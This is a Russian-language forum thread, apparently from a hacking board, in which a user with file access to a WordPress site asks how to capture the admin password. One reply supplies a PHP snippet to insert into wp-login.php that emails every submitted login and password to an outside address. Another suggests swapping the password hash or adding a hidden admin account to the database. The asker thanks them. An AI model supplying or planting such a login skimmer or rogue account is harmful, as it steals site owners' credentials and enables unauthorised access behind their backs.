Вопрос о wordpress

Alaich · 20 Aug 2016

Есть доступ к файлам сайта на wp , права все есть .Вопрос, как можно перехватить пароль в админку ?

pas9x · 21 Aug 2016

В начало файла wp-login.php добавить:

PHP:

if (!empty($_POST['log']) && !empty($_POST['pwd'])) { $msg = "Login: " . $_POST['log'] . "\n"; $msg .= "Pass: " . $_POST['pwd']; @mail('[email protected]', 'What you need', $msg); }

Absurd · 21 Aug 2016

Alaich said: ↑

Есть доступ к файлам сайта на wp , права все есть .Вопрос, как можно перехватить пароль в админку ?
Click to expand...

Пароль в открытой форме в вп нигде не фигурирует, только md5.
Так что как вариант либо скопировать из базы старый пароль, затем установить свой, войти в админку, сделать что надо и затем вернуть старый пароль.
Либо добавить базу нового админа и под ним заходить.

Alaich · 22 Aug 2016

pas9x said: ↑

В начало файла wp-login.php добавить:

PHP:

if (!empty($_POST['log']) && !empty($_POST['pwd'])) { $msg = "Login: " . $_POST['log'] . "\n"; $msg .= "Pass: " . $_POST['pwd']; @mail('[email protected]', 'What you need', $msg); }

Click to expand...

Спасибо!

Absurd · 22 Aug 2016

Alaich said: ↑

Спасибо!
Click to expand...

В том случае придётся ждать пока владелец сайта залогинится в админку. А зачем это делать, если можно и без этого обойтись

Вопрос о wordpress

Alaich Member

pas9x Elder - Старейшина

Absurd Member

Alaich Member

Absurd Member

Вопрос по шеллу

Вопрос про nmap ssh-hostkey

Вопрос по движку UMI.CMS

Useful Searches

Вопрос о wordpress

Alaich Member

pas9x Elder - Старейшина

Absurd Member

Alaich Member

Absurd Member

Вопрос по шеллу

Вопрос про nmap ssh-hostkey

Вопрос по движку UMI.CMS